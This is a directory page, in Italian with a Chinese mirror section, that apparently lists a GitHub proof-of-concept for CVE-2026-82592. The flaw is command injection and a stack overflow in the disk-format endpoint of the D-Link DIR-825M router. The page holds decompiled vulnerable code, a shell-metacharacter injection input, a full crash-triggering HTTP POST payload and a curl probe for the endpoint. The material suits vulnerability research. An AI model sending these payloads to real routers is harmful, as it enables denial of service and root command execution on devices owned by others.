Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/hackspeak/cve-2026-82592
Sicurezza IoTAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSicurezza Hardware e IoTBinary Exploitation
GitHubhackspeak/cve-2026-82592

CVE-2026-82592

Proof-of-concept exploit per il buffer overflow dello stack e l'iniezione di comandi in D-Link DIR-825M in /boafrm/formDiskFormat, che consente l'esecuzione remota di codice come root sul firmware v1.1.8.

Vedi Repository
111h 47m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Router D-Link DIR-825M - Buffer Overflow in /boafrm/formDiskFormat

Dettagli della Vulnerabilità

Informazioni Dettagliate

CampoValore
VendorD-Link
ProdottoD-Link DIR-825M (e altri modelli che condividono lo stesso codebase firmware)
Versione AffettaFirmware v1.1.8
Tipo di VulnerabilitàStack-based Buffer Overflow (CWE-121)、Command Injection (CWE-78)
Homepage del Vendorhttps://www.dlink.com/

Descrizione della Vulnerabilità

Durante una revisione di sicurezza del firmware del router, è stata identificata una vulnerabilità critica nell'endpoint /boafrm/formDiskFormat.

La vulnerabilità si trova nella funzione sub_46725C, che gestisce la formattazione delle partizioni. La funzione recupera il parametro partition controllato dall'utente dalla richiesta HTTP POST. Senza alcuna sanificazione preventiva, verifica o controllo di lunghezza su questo parametro, il programma esegue diverse operazioni non sicure:

  1. Usa sprintf per formattare il parametro in un piccolo buffer locale sullo stack v9 (allocato con soli 132 byte).
  2. Passa direttamente le stringhe di comando costruite a system() per eseguire utility di sistema.

Un attaccante può sfruttare questo inserendo metacaratteri di shell (come ;, & o |) nel parametro partition per eseguire comandi di sistema arbitrari con privilegi di root, oppure inviando una stringa eccessivamente lunga per causare un overflow del buffer sullo stack e dirottare il flusso di controllo.

  • Posizione della Vulnerabilità: /boafrm/formDiskFormat (o endpoint simile per la gestione della formattazione disco)
  • Funzione Vulnerabile: sub_46725C

Causa Principale

La vulnerabilità deriva da due difetti di programmazione concomitanti: formattazione di stringhe non sicura e esecuzione diretta di input non validati in una shell di sistema.

image0

1. Command Injection (CWE-78)

All'interno di sub_46725C, il parametro partition viene recuperato e memorizzato in v2:

root@kitploit:~
v2 = (const char *)sub_41351C(a1, "partition", "");

Se il parametro non è vuoto, il programma costruisce immediatamente un comando di smontaggio e lo esegue:

root@kitploit:~
sprintf(v9, "umount /dev/%s >/dev/null 2>&1", v2);
system(v9);

Poiché v2 viene incorporato direttamente nella stringa di comando senza sanificare caratteri come ;, un input di sda1;+sleep+5; verrà eseguito come:

root@kitploit:~
umount /dev/sda1; sleep 5; >/dev/null 2>&1

Questo attiva direttamente l'esecuzione arbitraria di comandi shell.

2. Stack-based Buffer Overflow (CWE-121)

Il buffer locale v9 è dichiarato sullo stack con una dimensione limitata:

root@kitploit:~
char v9[132];

Il programma usa sprintf per copiare l'input dell'utente in v9:

root@kitploit:~
sprintf(v9, "mkdir -p /var/tmp/usb/%s >/dev/null 2>&1", v2);

Poiché sprintf non esegue controlli sui limiti, un parametro partition più lungo di circa 90 byte scriverà oltre il confine di v9, sovrascrivendo il frame dello stack, inclusi il frame pointer salvato e l'indirizzo di ritorno ($ra in MIPS/ARM).

Impatto

Un attaccante può sfruttare questa vulnerabilità per ottenere i seguenti risultati:

  • Esecuzione Arbitraria di Comandi: Eseguire comandi shell arbitrari sul router con i privilegi più elevati (root).
  • Denial of Service (DoS): Sovrascrivere lo stack o corrompere la memoria per far crashare il demone del server Web, rendendo il pannello di gestione del router completamente inaccessibile.

Proof of Concept (PoC)

Fornendo un parametro partition eccessivamente lungo, lo stack verrà corrotto, causando un segmentation fault e il crash del demone del server Web.

root@kitploit:~
POST /boafrm/formDiskFormat HTTP/1.1
Host: 192.168.0.1
Content-Length: 655
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.1/diskformat.htm
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: webuicookie=16041526311804289383
Connection: keep-alive

partition=sda1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&systype=ext2&Apply+Changes=Apply+Changes&submit_url=%2Fdiskinfo.htm

Screenshot della riproduzione locale

  • Configurazione dell'ambiente usando firmae ed esecuzione del PoC tramite Burp Repeater

image1

  • Risultato:

image2


分发镜像说明(中文)

本仓库为 CVE-2026-82592(D-Link DIR-825M 磁盘格式化接口栈溢出 + 命令注入 RCE) 漏洞 PoC 的中转分发镜像(技术分析见上方上游原版报告 formDiskFormat.md)。内容由上游公开 PoC 报告镜像而来,仅作存档与分发用途。PoC 仅供安全研究、漏洞验证与授权测试,请勿用于未授权目标。

漏洞简述 / Vulnerability Summary

  • CVE-2026-82592 / D-Link DIR-825M(共享同一固件代码库的型号需一并排查)
  • 受影响版本:固件 v1.1.8
  • 类型:栈缓冲区溢出(CWE-121)+ 命令注入(CWE-78)→ 远程代码执行(RCE)
  • CVSS 3.1:9.9(Critical);CVSS 4.0:8.6(High)
  • 攻击面:Web 管理端磁盘格式化接口 POST /boafrm/formDiskFormat
  • 触发方式:向 partition 参数注入 shell 元字符(命令注入),或发送超长填充(栈溢出)
  • 利用结果:以 root 权限执行任意命令 / 使 Web 服务崩溃(DoS)
  • 修复状态:披露时厂商未公布补丁,请关注 D-Link 官方固件更新

核心原理:处理分区格式化的 sub_46725C 函数把用户可控的 partition 参数直接拼进两条命令——sprintf(v9, "mkdir -p /var/tmp/usb/%s ...", v2)(v9 仅 132 字节,无边界检查,超 ~90 字节即覆盖 $ra)与 sprintf(v9, "umount /dev/%s ...", v2); system(v9)(; & | 等元字符原样进 shell)。

环境与用法 / Requirements & Usage

  • 复现环境:FirmaE 固件仿真 + Burp Repeater(公开的是崩溃触发载荷,非完整 EXP)
  • 接口存在性检测:
root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" http://<路由器IP>/boafrm/formDiskFormat
# 返回 200 或 302(而非 404)说明接口存在
  • 复现请求(关键部分):
root@kitploit:~
POST /boafrm/formDiskFormat HTTP/1.1
Content-Type: application/x-www-form-urlencoded

partition=sda1aaaa...(超长填充)&systype=ext2&Apply+Changes=Apply+Changes&submit_url=%2Fdiskinfo.htm

免责声明 / Disclaimer

本 PoC 仅供教学、安全研究与授权测试使用,仅可对自有或获得明确授权的设备运行。利用会以 root 权限执行命令或使设备 Web 服务崩溃,请在可销毁的仿真环境中测试。

归属与许可 / Attribution & License

  • 上游 PoC 报告作者:Robots10(公开 IoT 漏洞仓库 IoT_vlu,reports/Dlink/formDiskFormat/)。
  • 分发仓库采用 MIT License(见 LICENSE)。

参考链接 / References

  • NVD:https://nvd.nist.gov/vuln/detail/CVE-2026-82592
  • CVE 记录:https://www.cve.org/CVERecord?id=CVE-2026-82592
  • D-Link 官网:https://www.dlink.com/
Scarica lo strumento